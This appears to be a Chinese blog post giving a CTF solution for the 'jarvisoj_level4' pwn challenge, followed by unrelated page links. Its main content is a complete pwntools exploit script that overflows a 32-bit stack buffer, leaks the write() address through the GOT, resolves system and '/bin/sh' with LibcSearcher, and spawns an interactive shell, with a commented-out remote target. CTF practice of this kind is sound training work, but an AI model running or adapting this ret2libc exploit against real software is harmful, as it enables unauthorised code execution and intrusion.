jarvisoj_level4

￡神魔★判官ぃ 2023-02-21 12:44 3阅读 0赞

在这里插入图片描述
exp

from pwn import *
from LibcSearcher import *
context.log_level = 'debug'
proc_name = './level4'
p = process(proc_name)
# p = remote('node3.buuoj.cn', 27523) 
elf = ELF(proc_name)
write_plt = elf.plt['write']
write_got = elf.got['write']
main_addr = elf.sym['main']
payload = b'a' * (0x88 + 0x4) + p32(write_plt) + p32(main_addr) + p32(0x1) + p32(write_got) + p32(0x4)
p.send(payload)
write_addr = u32(p.recv())
libc = LibcSearcher('write', write_addr)
libc_base = write_addr - libc.dump('write')
system_addr = libc_base + libc.dump('system')
str_bin_sh = libc_base + libc.dump('str_bin_sh')
payload1 = b'a' * (0x88 + 0x4) + p32(system_addr) + p32(main_addr) + p32(str_bin_sh)
p.send(payload1)
p.interactive()

在这里插入图片描述

发表评论取消回复

表情：

评论列表（有 0 条评论，3人围观）

还没有评论，来说两句吧...

相关阅读

相关 4.4 推断统计

【代码】4.4 推断统计。

超、凢脫俗/ 2024年05月09日 16:31/ 0 赞/ 133 阅读

相关 qtcreator/4.4/4.4.1/

[http://download.qt.io/archive/qtcreator/4.4/4.4.1/][http_download.qt.io_archive_qtcreat

爱被打了一巴掌/ 2024年02月19日 17:02/ 0 赞/ 135 阅读

相关 4-4 JDBC基础

第1关：JDBC与数据库的连接任务描述：本关任务：使用jdbc连接数据库相关知识： DriverManager：此类管理数据库驱动程序列表。可在JDB

淩亂°似流年/ 2024年02月19日 10:11/ 0 赞/ 139 阅读

相关 4.4 数据验证

> 第4章 Web开发 > > 4.1 [Web开发简介][Web] > 4.2 [URL映射][URL] > 4.3 [参数传递][Link 1] > 4.

雨点打透心脏的1/2处/ 2023年10月07日 23:27/ 0 赞/ 124 阅读

相关 MongoDB 4.4 安装

官网下载：[https://www.mongodb.com/try/download/community][https_www.mongodb.com_try_download

港控/mmm°/ 2023年10月05日 21:31/ 0 赞/ 27 阅读

相关 4.4-node-web

1 模块查找机制 require('./a'); // a.js 1.1 模块有路径没有后缀名 1 首先找同名js 找到则执行 2 找不到则找同名js文

待我称王封你为后i/ 2023年07月22日 09:14/ 0 赞/ 94 阅读

相关 4.4CSRF防御

4.4 CSRF防御文章目录 4.4 CSRF防御二次确认 Token 认证原理 T

淩亂°似流年/ 2023年02月13日 11:18/ 0 赞/ 89 阅读

相关 4.4.4 消费者的消息处理语义

-------------------- 4.4.4 消费者的消息处理语义消费者从消息代理节点拉取到分区的消息后，对一条消息的处理语义有下面3种情况。至多一

た入场券/ 2023年01月13日 15:56/ 0 赞/ 306 阅读

相关 Spring4+SpringMVC4+hibernate4整合

源码下载:[https://github.com/rj2017211811/springmvc-hibernate][https_github.com_rj2017211811

刺骨的言语ヽ痛彻心扉/ 2022年03月07日 02:48/ 0 赞/ 595 阅读

相关 4.4 参数传递

基本数据类型参数的传值引用类型参数的传值一：基本数据类型参数的传值比如方法f int f(int a){ retu

一时失言乱红尘/ 2021年09月29日 01:32/ 0 赞/ 405 阅读